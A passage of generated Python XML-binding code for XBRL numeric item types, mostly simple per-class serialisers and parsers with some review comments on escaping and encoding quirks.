            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='fractionItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='fractionItemType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.numerator is not None:
            showIndent(outfile, level, pretty_print)
            # NOTE(review): the numerator is emitted under a hard-coded
            # 'xbrli:' prefix (not namespace_) — mirrors the generated
            # original; confirm against the target schema.
            outfile.write('<%snumerator>%s</%snumerator>%s' % ('xbrli:', self.gds_format_string(quote_xml(self.numerator).encode(ExternalEncoding), input_name='numerator'), 'xbrli:', eol_))
        if self.denominator is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sdenominator>%s</%sdenominator>%s' % (namespace_, self.gds_format_float(self.denominator, input_name='denominator'), namespace_, eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'numerator':
            # Numerator is kept as validated text.
            self.numerator = self.gds_validate_string(child_.text, node, 'numerator')
        elif nodeName_ == 'denominator':
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            self.denominator = self.gds_validate_float(fval_, node, 'denominator')
# end class fractionItemType
class integerItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``integerItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = integerItemType.subclass or integerItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='integerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='integerItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='integerItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='integerItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='integerItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class integerItemType
class nonPositiveIntegerItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``nonPositiveIntegerItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = nonPositiveIntegerItemType.subclass or nonPositiveIntegerItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='nonPositiveIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='nonPositiveIntegerItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='nonPositiveIntegerItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='nonPositiveIntegerItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='nonPositiveIntegerItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class nonPositiveIntegerItemType
class negativeIntegerItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``negativeIntegerItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = negativeIntegerItemType.subclass or negativeIntegerItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='negativeIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='negativeIntegerItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='negativeIntegerItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='negativeIntegerItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='negativeIntegerItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class negativeIntegerItemType
class longItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``longItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = longItemType.subclass or longItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='longItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='longItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='longItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='longItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='longItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class longItemType
class intItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``intItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = intItemType.subclass or intItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='intItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='intItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='intItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='intItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='intItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class intItemType
class shortItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``shortItemType`` item.

    Holds a single text value (``valueOf_``) plus the standard XBRL
    numeric-item attributes: unitRef, decimals, id, contextRef and
    precision.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'decimals', 'id', 'contextRef', 'precision')
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs,
                               (unitRef, decimals, id, contextRef, precision)):
            setattr(self, name, _cast(None, value))
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = shortItemType.subclass or shortItemType
        return target(*args_, **kwargs_)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Content is the (truthy) text value only; there are no children.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='shortItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes plus text content) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='shortItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): mirrors the generated original — the text value
            # is encoded but not XML-escaped.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='shortItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_,))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='shortItemType'):
        # Emit each attribute at most once, in schema order.
        for attr_ in self._item_attrs:
            value_ = getattr(self, attr_)
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='shortItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Copy each known attribute from the node; first writer wins.
        for attr_ in self._item_attrs:
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class shortItemType
class byteItemType(GeneratedsSuper):
    """Generated binding for the XBRL byteItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = byteItemType.subclass or byteItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='byteItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='byteItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='byteItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='byteItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='byteItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class byteItemType
class nonNegativeIntegerItemType(GeneratedsSuper):
    """Generated binding for the XBRL nonNegativeIntegerItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = nonNegativeIntegerItemType.subclass or nonNegativeIntegerItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='nonNegativeIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='nonNegativeIntegerItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='nonNegativeIntegerItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='nonNegativeIntegerItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
